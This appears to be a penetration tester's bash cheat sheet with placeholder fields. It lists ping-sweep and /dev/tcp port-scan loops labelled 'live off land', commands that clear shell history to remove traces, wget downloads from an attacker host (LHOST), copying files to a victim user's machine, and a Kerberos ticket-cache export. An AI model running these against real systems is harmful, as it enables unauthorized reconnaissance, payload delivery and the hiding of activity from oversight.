% bash/misc

# grep help
<binary> --help |& grep -- "<string>"

# copy paste clipboard
cat <FILE> | xclip -selection clipboard

# scp modified files only with ssh key
rsync -Pavu -e "ssh -i $HOME/.ssh/<KEY_NAME>" <FILE> <VIC_USER>@<REMOTE_IP>:~

# live off land: hostscan /24
for i in {1..255}; do (ping -c 1 <SUBNET_IP>.${i} | grep "bytes from" &); done

# live off land: portscan
for i in {1..65535}; do (echo > /dev/tcp/<IP>/$i) >/dev/null 2>&1 && echo $i is open; done

# latest apache access logs
tail -f /var/log/apache2/access.log

# clear history
history -c && history -w
rm ~/.zsh_history

# download wget
wget http://<LHOST>/<PATH>

# download wget rename
wget http://<LHOST>/<PATH> -O <NEWFILE>

# rockyou.txt
sudo tar xvzf /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz -C /usr/share/seclists/Passwords/Leaked-Databases/

# linux kerberos
export KRB5CCNAME=/tmp/krb5cc_minenow

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
